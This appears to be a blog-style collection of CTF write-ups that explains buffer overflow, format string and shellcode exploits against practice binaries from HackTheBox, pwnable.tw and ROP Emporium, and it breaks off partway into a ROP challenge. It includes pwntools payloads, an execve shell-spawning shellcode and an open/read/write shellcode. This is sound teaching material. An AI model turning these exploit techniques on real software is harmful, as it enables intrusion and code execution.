Notes: The Case Identification section is about finding the bug, i.e. which part of the program is vulnerable, while the Solution section explains how to exploit the program based on the vulnerability found during case identification.
Keyword: Buffer Overflow, ret2win
Challenge URL: https://app.hackthebox.com/challenges/You%2520know%25200xDiablos
Let's check the binary information and its protection by using checksec
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x8048000)
Stack: Executable
RWX: Has RWX segments
It seems that all the security protections of the file are disabled. Since there is no stack canary and PIE is disabled, we can overflow the buffer and redirect execution using a basic return2win technique.
First of all, we need to know the offset from the start of the buffer to the point where the overflow takes control. Let's set a breakpoint on the main function and create an input long enough to overflow the program. I use the cyclic 300 command from pwndbg to make the payload, and here is what I got when debugging with pwndbg.
Based on the output above, the instruction pointer (EIP) is not pointing to a valid address; instead it holds bytes from our input payload. EIP is the register that stores the memory address of the instruction that will be executed next by the processor. If we gain control over EIP, we can arbitrarily change the program flow.
Since EIP holds the string waab, or 0x62616177 as a little-endian 32-bit value, we can also change this value to another memory address, namely the code that gives us the flag. There are 3 user-defined functions in this program:
0x080491e2 flag
0x08049272 vuln
0x080492b1 main
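The relationship between the characters seen in EIP and the numeric value, and the way an address from the list above has to be laid out in memory, can be checked with a few lines of standard-library Python. This is only a sketch of the byte-order conversion; the helper names eip_to_text and address_to_bytes are made up for illustration and are not part of pwntools or pwndbg.

```python
import struct

def eip_to_text(value: int) -> str:
    """Show which 4 input characters a 32-bit EIP value corresponds to."""
    # "<I" = unsigned 32-bit integer, little-endian (least significant byte first)
    return struct.pack("<I", value).decode("ascii")

def address_to_bytes(address: int) -> bytes:
    """Lay out a 32-bit address the way it must appear inside the payload."""
    return struct.pack("<I", address)

print(eip_to_text(0x62616177))        # the cyclic substring that landed in EIP
print(address_to_bytes(0x080491e2))   # the flag function address, byte-reversed
```

pwntools offers p32() for the same packing, so in a real exploit script the second helper is not needed.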
Our goal is to get the flag from the flag function, which is never called anywhere in the code. But before we go deeper, let's analyze the disassembly of the main function to understand the program flow. Here is the snippet:
0x0804930b <main+90> : call 0x8049070 <puts@plt>
0x08049310 <main+95> : add esp,0x10
==> 0x08049313 <main+98> : call 0x8049272 <vuln>
0x08049318 <main+103>: mov eax,0x0
0x0804931d <main+108>: lea esp,[ebp-0x8]
Here, we have main+98, which calls the vuln function before executing the next instruction. Let's step into that function to analyze the program further.
0x0804928a <+24>: lea eax,[ebp-0xb8]
0x08049290 <+30>: push eax
==> 0x08049291 <+31>: call 0x8049040 <gets@plt>
0x08049296 <+36>: add esp,0x10
0x08049299 <+39>: sub esp,0xc
0x0804929c <+42>: lea eax,[ebp-0xb8]
0x080492a2 <+48>: push eax
==> 0x080492a3 <+49>: call 0x8049070 <puts@plt>
0x080492a8 <+54>: add esp,0x10
0x080492ab <+57>: nop
0x080492ac <+58>: mov ebx,DWORD PTR [ebp-0x4]
0x080492af <+61>: leave
0x080492b0 <+62>: ret
We found something interesting here. If you look closer, there is a vulnerable part of that function which allows the user to input an arbitrary payload. The gets function does no bounds checking and will continue to store characters past the end of the buffer. So it's dangerous to use the gets function, because the program will be vulnerable to a buffer overflow attack.
In addition, there is also a puts function that will print the output based on your input. We can use this later to print out the flag.
Since we know that the gets function is vulnerable, we can start to exploit the program. Based on our first findings about EIP, the saved return address sits 188 bytes after the start of the buffer: the buffer begins at ebp-0xb8 (184 bytes below EBP) and is followed by the 4-byte saved EBP. This is shown in the image below.
The next 4 bytes, starting from the 189th character of the payload, will go into the EIP register. We can set these 4 bytes so that EIP points to, and executes, the memory address we want. Here, we replace them with the starting address of the flag function, which is 0x080491e2.
Don't forget about the byte ordering of this binary file. The file is little-endian (least significant byte first), so we must write the address bytes in reverse order like this: \xe2\x91\x04\x08. Now let's try our first dummy payload. I use pwntools to do this. Here is the snippet:
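from pwn import *

# Start the binary locally and attach pwndbg with a breakpoint at vuln+61
p = process('./vuln')
gdb.attach(p, '''
init-pwndbg
break *0x080492af
continue
''')
# 188 filler bytes, then the address of flag in little-endian order
payload = b'a'*188 + b'\xe2\x91\x04\x08'
p.sendlineafter(b'0xDiablos:', payload)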
Set a breakpoint on 0x080492af so we can analyze the value of the registers (especially EIP) just before we hit the return instruction of the vuln function.
Good. If you look closer at the image above, there is a tiny down-arrow icon from vuln+62 to the flag address. This means our payload has successfully overwritten the return address, so vuln returns into the flag function. But even if you can reach the flag function, there is another problem. There are 2 comparisons, as shown in the image below.
Those comparisons are most likely combined with an AND operator, so you must pass both conditions in order to get the flag. The first condition (0x08049246) compares the first argument with 0xdeadbeef, while the second condition (0x0804924f) compares the second argument with 0xc0ded00d. If you are still not sure about what's going on, make sure you understand the program flow as shown in the image above.
Before continuing with the exploit, remember that there is some padding between the address we return to and the arguments. Because flag is entered through ret rather than call, it still expects a return address on top of the stack when it starts, and it reads its arguments from the slots after that. On 32-bit x86 this slot is 4 bytes wide (on x64 the first arguments are passed in registers instead, so the layout is different). You can check this article for more details.
Now let's make the final exploit to pass those conditions. Based on our findings so far, the final exploit will consist of:
- 188 dummy characters to fill the buffer up to the return address
- Memory address of the flag function
- 4 bytes of padding (the fake return address for flag)
- 2 arguments to pass the branch conditions (0xdeadbeef) and (0xc0ded00d), each in little-endian byte order
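The layout listed above can be sketched with the standard library alone. This is not the author's solver script, just an illustration of the byte layout. It assumes the usual 32-bit cdecl convention, where the 4-byte slot directly after the overwritten return address is what flag treats as its own return address, with the two arguments following it. The name build_payload is made up for this example.

```python
import struct

OFFSET = 188             # filler bytes up to the saved return address
FLAG_ADDR = 0x080491e2   # start of the flag function

def build_payload() -> bytes:
    payload = b"a" * OFFSET
    payload += struct.pack("<I", FLAG_ADDR)   # overwrites vuln's return address
    payload += b"b" * 4                       # slot that flag sees as its own return address
    # first and second argument, each packed little-endian
    payload += struct.pack("<II", 0xdeadbeef, 0xc0ded00d)
    return payload

payload = build_payload()
print(len(payload), payload[OFFSET:].hex())
```

With pwntools the same bytes would normally be produced with p32(), and the result sent with sendlineafter as in the earlier snippet.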
Execute the solver script and we get the flag. Here is the final script I used to solve this challenge.
Keyword: Format String Vulnerability
Challenge URL: https://app.hackthebox.com/challenges/racecar
This challenge gives us an executable file with all security protections enabled. There are many user-defined functions in the disassembled code, but some of them just print the menu or a text message, which is not very useful for solving the challenge.
We just need to focus on car_menu because user input occurs in this function. Based on the decompiled car_menu function, if the user wins the race, the program prompts the user to enter a message. It then attempts to open a file named "flag.txt" and reads its contents.
So our main goal is to get the program to prompt for user input so we can enter our payload there. But how can we even win the race if the outcome is determined by random numbers?
if (((iVar1 == 1) && (iVar2 < iVar3)) || ((iVar1 == 2 && (iVar3 < iVar2)))) {
  printf("%s\n\n[+] You won the race!! You get 100 coins!\n",&DAT_00011540);
  coins = coins + 100;
  puVar5 = &DAT_00011538;
  printf("[+] Current coins: [%d]%s\n",coins,&DAT_00011538);
  printf("\n[!] Do you have anything to say to the press after your big victory?\n> %s",
         &DAT_000119de);
  __format = (char *)malloc(0x171);
  __stream = fopen("flag.txt","r");
  if (__stream == (FILE *)0x0) {
    printf("%s[-] Could not open flag.txt. Please contact the creator.\n",&DAT_00011548,puVar5);
    /* WARNING: Subroutine does not return */
    exit(0x69);
  }
  fgets(local_3c,0x2c,__stream);
  read(0,__format,0x170);
  puts(
      "\n\x1b[3mThe Man, the Myth, the Legend! The grand winner of the race wants the whole world to know this: \x1b[0m"
      );
  printf(__format);
}
else if (((iVar1 == 1) && (iVar3 < iVar2)) || ((iVar1 == 2 && (iVar2 < iVar3)))) {
  printf("%s\n\n[-] You lost the race and all your coins!\n",&DAT_00011548);
  coins = 0;
  printf("[+] Current coins: [%d]%s\n",0,&DAT_00011538);
}
The program determines the winner based on randomly generated numbers, but we can actually increase our chance to win the game. Here is how it works:
- When you choose car option 1 and select the circuit race (option 2), the relevant code block is executed:
  if (((iVar1 == 1) && (iVar2 == 2)) || ((iVar1 == 2 && (iVar2 == 2)))) { iVar2 = rand(); iVar2 = iVar2 % 10; iVar3 = rand(); iVar3 = iVar3 % 100; }
  - In this case, iVar2 (your car number) is generated using rand() % 10, which results in a number between 0 and 9. On the other hand, iVar3 (the opponent's car number) is generated using rand() % 100, which results in a number between 0 and 99.
  - Since your car number (iVar2) is always less than 10 and the opponent's car number (iVar3) is between 0 and 99, the condition iVar2 < iVar3 is highly likely to be satisfied, resulting in winning the race.
- When you choose car option 2 and select the highway battle (option 1), the relevant code block is executed:
  else if (((iVar1 == 1) && (iVar2 == 1)) || ((iVar1 == 2 && (iVar2 == 1)))) { iVar2 = rand(); iVar2 = iVar2 % 100; iVar3 = rand(); iVar3 = iVar3 % 10; }
  - In this case, iVar2 (your car number) is generated using rand() % 100, which results in a number between 0 and 99. On the other hand, iVar3 (the opponent's car number) is generated using rand() % 10, which results in a number between 0 and 9. The winning condition for car 2, iVar3 < iVar2, is therefore highly likely to be satisfied as well.
To summarize, we are very likely to win the race if we choose either car option 1 and the circuit race (option 2), or car option 2 and the highway battle (option 1). Once we win, the program prompts for user input. Now it's time to figure out how to leverage this user input to exploit the program.
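To put a number on "highly likely", the winning chance for these combinations can be counted exhaustively. The sketch below assumes that both remainders are uniformly distributed and independent, which is only approximately true for rand(). The function name win_probability is made up for this example.

```python
from fractions import Fraction

def win_probability(own_mod: int, rival_mod: int) -> Fraction:
    """P(own < rival) for own = rand() % own_mod and rival = rand() % rival_mod.

    Assumes uniform, independent remainders (an idealisation of rand()).
    """
    wins = sum(
        1
        for own in range(own_mod)
        for rival in range(rival_mod)
        if own < rival
    )
    return Fraction(wins, own_mod * rival_mod)

# Car 1 + circuit: our number is rand() % 10, the opponent's is rand() % 100
p = win_probability(10, 100)
print(p, float(p))
```

Under these assumptions the chance is 189/200, or 94.5%. The car 2 and highway battle case is the mirror image (opponent in 0..9, us in 0..99, win when the opponent's number is lower), so it has the same probability.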
The main vulnerability in this program is a format string vulnerability. It occurs in the car_menu function after you win the race. Here's the relevant code:
__format = (char *)malloc(0x171);
__stream = fopen("flag.txt","r");
if (__stream == (FILE *)0x0) {
printf("%s[-] Could not open flag.txt. Please contact the creator.\n",&DAT_00011548,puVar5);
exit(0x69);
}
fgets(local_3c,0x2c,__stream);
read(0,__format,0x170);
puts("\n\x1b[3mThe Man, the Myth, the Legend! The grand winner of the race wants the whole world to know this: \x1b[0m");
printf(__format);
The vulnerability lies in the last line: printf(__format). Here, the program passes user input (__format) directly to printf as the format string, instead of printing it through a fixed format such as "%s". This allows an attacker to use format specifiers to read or write memory. Using the %x or %p specifiers, you can leak values from the stack. Now the question is, what needs to be leaked?
In the car_menu function, we see this code:
char local_3c [44];
...
fgets(local_3c,0x2c,__stream);
local_3c is a local array of 44 bytes, declared within the function. Local arrays like this one are stored on the stack. The fgets call reads up to 43 characters (0x2c minus one for the terminating null byte) from the flag file into this array. This way, we can leak the flag out of the stack. We can just input multiple %p specifiers to exploit the program.
A stack layout visualization of the car_menu function would look something like this:
The stack grows downward in memory: when a function is called, new data is pushed onto the stack at lower addresses. The printf function expects an argument for each format specifier in the format string. If there aren't enough arguments, printf will still try to read values from the stack for each specifier.
When you call printf(user_input) instead of printf("%s", user_input), you're allowing the user to control the format string. This means the user can include format specifiers that printf will try to interpret.
printf starts reading from where it expects the first argument to be. In this case, that is likely the stack slot right after the __format pointer. Since we're not providing actual arguments to match the format specifiers, printf keeps reading and moving further along the stack, toward higher addresses (that's why the chall name is racecar :').
Each %p causes printf to read the next 4 bytes and move to the next word in memory. Since local_3c (containing the flag) is a local variable, it's on the stack, making it accessible via this method. This process continues for as many %p specifiers as you provide, potentially reading through the entire stack frame.
The key point is that each %p moves the read position 4 bytes further along the stack. So if your input is %p %p %p %p %p %p, you might see output like: 0x62ab0200 0x170 0x60e76dfa 0x2d 0x7 0x26. You can create a fake flag.txt file locally that contains AAAABBBB, so that it is easier to spot where the flag is.
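Once the leaked words are on screen, they still have to be turned back into text. A minimal sketch of that step, assuming the output is a space-separated list of %p values from a 32-bit little-endian process; decode_leak is a hypothetical helper name, and the sample input is the AAAABBBB test pattern rather than real challenge output.

```python
import struct

def decode_leak(leak: str) -> bytes:
    """Turn space-separated %p output into the raw bytes that were on the stack."""
    raw = b""
    for token in leak.split():
        # glibc prints a zero pointer as "(nil)" instead of 0x0
        value = 0 if token == "(nil)" else int(token, 16)
        # each word was read as a 32-bit little-endian value
        raw += struct.pack("<I", value)
    return raw

print(decode_leak("0x41414141 0x42424242"))
```

With the fake flag file in place, the words that decode to AAAA and BBBB mark the positions where the real flag will appear on the remote target.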
Here is the solver script that I used to implement this solution and solve the challenge.
Keyword: System Call, Shellcode
Challenge URL: https://pwnable.tw/challenge/#1
When you try to disassemble the binary file, you will see that it doesn't have a main function, which is commonly used in many C programs.
Non-debugging symbols:
0x08048060 _start
0x0804809d _exit
0x080490a3 __bss_start
0x080490a3 _edata
0x080490a4 _end
In a standard C program, _start is provided by the C runtime and it sets up the environment before calling main. When there is no main symbol in the program, as here, _start directly contains the program's own code. It's common to use _start as the entry point when writing pure assembly.
So let's start by analyzing the _start symbol.
In general, here is how some registers are used in this challenge for making a syscall (x86 assembly):
- al (lower 8 bits of eax): stores the syscall number. On 32-bit x86 Linux, 4 is for write and 3 is for read
- bl (lower 8 bits of ebx): stores the file descriptor, 0 for stdin and 1 for stdout
- dl (lower 8 bits of edx): length of the buffer in bytes
If you are still confused about those registers, make sure you have read the following repository for more explanation.
Based on the image above, the program pushes the string "Let's start the CTF:" onto the stack (20 bytes) in reverse order. It then writes this 20-byte string to stdout. After writing the string, the program doesn't adjust the stack pointer (there's no add esp, X instruction before the read).
The read syscall then starts writing data to the stack at the same position where the original string was stored. This means that any input beyond 20 bytes will start overwriting the stack frame.
The vulnerability occurs because the read operation can accept up to 60 bytes, but the available buffer space is only 20 bytes. Any input beyond 20 bytes overwrites adjacent stack memory, including the return address, which we can use to control the EIP register. Since there is no function that prints the flag, our main goal is to spawn an interactive shell by crafting shellcode.
# 1st payload
payload = b"A"*20
payload += p32(0x08048087)
p.send(payload)
esp = unpack(p.read()[:4])
info("Leaked Address: " + hex(esp))
The first payload is crafted to leak the stack pointer (ESP) value. When the function returns, it jumps to the mov ecx, esp instruction at address 0x08048087. Since we are back before the write syscall, the program writes the 20 bytes that ECX (now equal to ESP) points to, and the first 4 of those bytes hold a stack address.
In short, the first payload allows the exploit to determine the current stack address, which is essential for accurately placing the shellcode in the next stage. This leaked address is then used to calculate where the shellcode will sit, so that the second payload can jump to it accurately.
# 2nd payload
shellcode = asm(
"""
xor ecx, ecx
mul ecx
push ecx
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
mov al, 11
int 0x80
"""
)
payload = b"A"*20
payload += p32(esp+20)
payload += shellcode
For the second payload, we again need 20 bytes of padding to reach the return address. But instead of returning to the original address, it returns to esp+20, which points to the beginning of the shellcode. esp+20 is calculated to point just past the 20 padding bytes and the 4-byte return address overwrite.
Why do we need to return to esp+20?
- esp is the leaked stack address from the first stage.
- '+20' is an offset to point past the buffer and overwritten return address.
- This new address will point to the start of the shellcode in memory.
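The arithmetic for the second stage can be written out without pwntools. This sketch only mirrors the layout of the snippet above (20 bytes of padding, the return address, then the shellcode) and adds a check against the 60-byte read limit. The name build_stage2, the sample address and the placeholder shellcode bytes are all made up for illustration.

```python
import struct

PAD_LEN = 20       # bytes occupied by the greeting string on the stack
READ_LIMIT = 60    # the read syscall accepts at most 60 bytes

def build_stage2(leaked_esp: int, shellcode: bytes) -> bytes:
    """Padding, then the address of the shellcode, then the shellcode itself."""
    payload = b"A" * PAD_LEN
    payload += struct.pack("<I", leaked_esp + 20)   # same bytes as p32(esp+20)
    payload += shellcode
    if len(payload) > READ_LIMIT:
        raise ValueError("payload does not fit in the 60-byte read")
    return payload

# Hypothetical leaked address and placeholder bytes, not real challenge values
example = build_stage2(0xffffd000, b"\x90" * 8)
print(len(example), example[20:24].hex())
```

The length check shows how tight the budget is: 60 - 24 leaves at most 36 bytes for the shellcode.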
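The 20 in esp+20 is crucial because it makes the jump land exactly at the start of the shellcode. The second read starts writing 4 bytes below the leaked address, and the shellcode begins 24 bytes into our input (20 bytes of padding plus the 4-byte return address), so it ends up at esp - 4 + 24 = esp + 20. Here is the final script to solve the challenge.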
Keyword: System Call, Shellcode
Challenge URL: https://pwnable.tw/challenge/#2
The goal of this challenge is to read a flag file located at /home/orw/flag on the server, but with restrictions on which system calls can be used. Only three syscalls are allowed in this challenge: open, read, and write.
Let's examine the disassembled main function of the binary executable file. Here is the full disassembled main, and here is the snippet:
0x08048566 <+30>: call 0x8048380 <printf@plt>
0x0804856b <+35>: add esp,0x10
0x0804856e <+38>: sub esp,0x4
0x08048571 <+41>: push 0xc8
0x08048576 <+46>: push 0x804a060
0x0804857b <+51>: push 0x0
0x0804857d <+53>: call 0x8048370 <read@plt>
0x08048582 <+58>: add esp,0x10
0x08048585 <+61>: mov eax,0x804a060
0x0804858a <+66>: call eax
0x0804858c <+68>: mov eax,0x0
0x08048591 <+73>: mov ecx,DWORD PTR [ebp-0x4]
0x08048594 <+76>: leave
0x08048595 <+77>: lea esp,[ecx-0x4]
0x08048598 <+80>: ret
- First, those instructions set up and call the read function.
  - 0xc8 (200 in decimal) is pushed onto the stack, which is the maximum number of bytes to read.
  - 0x804a060 is pushed onto the stack. This is the address of the buffer where the input will be stored.
  - 0x0 (file descriptor for stdin) is pushed onto the stack.
- The read function is then called, which reads up to 200 bytes from stdin into the buffer at 0x804a060.
0x08048585 <+61>: mov eax,0x804a060
0x0804858a <+66>: call eax
The key vulnerability is the call eax instruction at 0x0804858a. This instruction executes whatever is in the buffer at 0x804a060, which is filled with user input. In other words, the program takes the user's input, which was just read into the buffer at 0x804a060, and executes it directly as code.
Since our input is executed directly as code, we just need to issue the open, read, and write syscalls in order to get the flag. Let's start with the open syscall in x86 assembly.
xor eax, eax
push eax
add eax, 5
push 0x67616C66
push 0x2f77726f
push 0x2f656d6f
push 0x682f2f2f
mov ebx, esp
mov edx, 0
mov ecx, 0
int 0x80
On x86 Linux, the open syscall is used to open a file or create a new one. The open syscall reads the string that ebx points to (we set ebx to point to the start of our string on the stack) and keeps reading until it hits the null terminator.
You can refer to this article for more detail. The C-equivalent declaration of the open syscall is:
int open(const char *pathname, int flags, mode_t mode)
In assembly, you set up the syscall like this:
- eax: Syscall number (5 for open)
- ebx: Pointer to the null-terminated string of the pathname
- ecx: Flags (e.g., O_RDONLY, O_WRONLY, O_RDWR)
- edx: Mode (permissions, only used when creating a new file)
Actually, I was stuck for hours working on the open syscall. At first I thought that the first three instructions of the payload were equivalent to mov eax, 5, so I could just replace those 3 instructions with mov eax, 5. Both approaches end up storing 5 in the eax register, but the replacement is actually wrong.
xor eax, eax is the preferred way to zero a register because it doesn't introduce null bytes, which is important for crafting shellcode. On the other hand, mov eax, 5 translates to \xb8\x05\x00\x00\x00 in machine code, which contains null bytes. In shellcode, we often need to avoid null bytes (0x00) because they can terminate strings when the payload is copied by a string function. In this challenge the input is taken with read, which does not stop at null bytes, so the more important difference is what push eax puts on the stack.
A null terminator is a byte with the value 0 that marks the end of a string. It tells the system "the string ends here". When you pass a string to a syscall, it needs to know where the string ends. It keeps reading memory until it hits a null byte.
The push eax after xor eax, eax is crucial. It pushes the value in eax (which is 0) onto the stack, which serves as the null terminator for the filename string that will be constructed next.
Imagine if we didn't have the null terminator: the open syscall might try to open a file with a much longer, incorrect name, leading to errors or unexpected behavior. The push eax (when eax is 0) is what terminates the name of the file we're going to open.
Stack operations (push) and register operations (add eax, 5) are independent. The add eax, 5 instruction is part of syscall preparation, not filename construction. The stack grows downward, so the last item pushed sits at the lowest address, while a string is read from low to high addresses. Pushing the 4-character chunks in reverse order therefore creates the correct string in memory. Remember that the file is little-endian, so the byte order within each pushed value is reversed as well.
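The push constants do not have to be worked out by hand. The following sketch derives them from a path string, assuming an absolute path that can be padded with extra leading slashes (Linux treats ///home the same as /home). push_words is a hypothetical helper name, not a pwntools function.

```python
import struct

def push_words(path: str) -> list[int]:
    """Return the 32-bit immediates for a path, in the order they must be pushed."""
    data = path.encode()
    # Pad with leading slashes so the length is a multiple of 4
    data = b"/" * (-len(data) % 4) + data
    chunks = [data[i:i + 4] for i in range(0, len(data), 4)]
    # The last chunk is pushed first; each chunk is read as a little-endian integer
    return [struct.unpack("<I", chunk)[0] for chunk in reversed(chunks)]

for word in push_words("/home/orw/flag"):
    print(f"push {word:#010x}")
```

For /home/orw/flag this yields the same four values as the push instructions in the open snippet. The null terminator still has to be pushed separately before them.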
/* Read Syscall */
mov eax, 3
mov ecx, ebx
mov ebx, eax
mov edx, 38
int 0x80
/* Write Syscall */
mov eax, 4
mov ebx, 1
int 0x80
The next syscalls are read and write. They are much more readable than the previous one. The key point of both syscalls is the file descriptor. You may be wondering:
Why is the fd set to 3 instead of 0? I thought that the read syscall is about reading input, so I would use 0 for stdin. But why is it 3?
The reason is related to how file descriptors are assigned in Unix-like systems:
- 0 is reserved for stdin (standard input)
- 1 is reserved for stdout (standard output)
- 2 is reserved for stderr (standard error)
When you open a new file with the open syscall, the kernel assigns the lowest available file descriptor number. Since 0, 1, and 2 are already taken, the first file a process opens typically gets descriptor 3, and any subsequent files get the next available numbers.
We use 3 because we want to read from the file we just opened, not from stdin. If we used 0, we'd be reading from stdin (keyboard input) instead of our flag file. That's why we use the file descriptor returned by open (which is 3) instead of 0. Note that in the snippet above, mov ebx, eax copies the 3 that was just loaded into eax as the read syscall number, so the code relies on open having returned 3.
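The same open, read, write sequence can be tried from Python through the os module, which wraps these syscalls closely. This is only an analogy to the shellcode, run against a temporary file with placeholder contents; open_read is a made-up name, and the count of 38 simply mirrors the value used in the read snippet.

```python
import os
import tempfile

def open_read(path: str, count: int) -> bytes:
    # open: the kernel hands back the lowest free descriptor (typically 3)
    fd = os.open(path, os.O_RDONLY)
    try:
        # read: uses the descriptor returned by open, not 0 (stdin)
        return os.read(fd, count)
    finally:
        os.close(fd)

# Placeholder file standing in for the flag
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(b"FLAG{placeholder}\n")
demo_path = tmp.name

data = open_read(demo_path, 38)
os.write(1, data)        # write: descriptor 1 is stdout
os.remove(demo_path)
```

Passing the descriptor returned by open straight into read avoids hard-coding 3, which is the more robust choice whenever other files may already be open.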
Here is the solver script that I used to complete this challenge.
Keyword: Buffer Overflow, Return Oriented Programming
Challenge URL: https://ropemporium.com/challenge/split.html
A simple Return-Oriented Programming challenge which requires us to exploit buffer overflow vulnerability to execute a specific command that will read the flag. Here is the information of the file:
There are 3 user-defined functions in the binary file: main, pwnme, and usefulFunction. The vulnerable part is in the pwnme() function, specifically in this line: read(0,local_28,0x60). Here is the decompiled code of the pwnme function:
void pwnme(void)
{
  undefined local_28 [32];

  memset(local_28,0,0x20);
  puts("Contriving a reason to ask user for data...");
  printf("> ");
  read(0,local_28,0x60);
  puts("Thank you!");
  return;
}
The buffer local_28 can only hold 32 bytes safely, but the read() call is allowed to write up to 96 bytes (0x60) into this buffer. This means we can write 64 bytes more than the buffer can safely hold. The first 32 bytes fill the buffer as intended. The next 64 bytes overflow the buffer and are written into adjacent memory.
So our idea is to craft input that's longer than 32 bytes. The extra bytes can be designed to change where the program goes next.
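As a rough sketch of what such an input looks like, the snippet below pads up to the saved return address and then places one 8-byte address. It assumes the x86-64 build of the challenge with an 8-byte saved frame pointer directly after the buffer, which the excerpt above does not confirm, and the address passed in is a pure placeholder. build_overflow is a made-up name.

```python
import struct

BUF_SIZE = 0x20    # local_28 holds 32 bytes
READ_SIZE = 0x60   # read() accepts up to 96 bytes
SAVED_RBP = 8      # assumption: x86-64, saved frame pointer follows the buffer

def build_overflow(return_address: int) -> bytes:
    """Fill the buffer and the saved frame pointer, then overwrite the return address."""
    offset = BUF_SIZE + SAVED_RBP
    payload = b"A" * offset + struct.pack("<Q", return_address)
    assert len(payload) <= READ_SIZE, "payload exceeds what read() will accept"
    return payload

payload = build_overflow(0x400000)   # hypothetical address, not taken from the binary
print(len(payload), READ_SIZE - len(payload))
```

Under these assumptions the return address starts at offset 40, which leaves 48 bytes after it for the rest of a ROP chain.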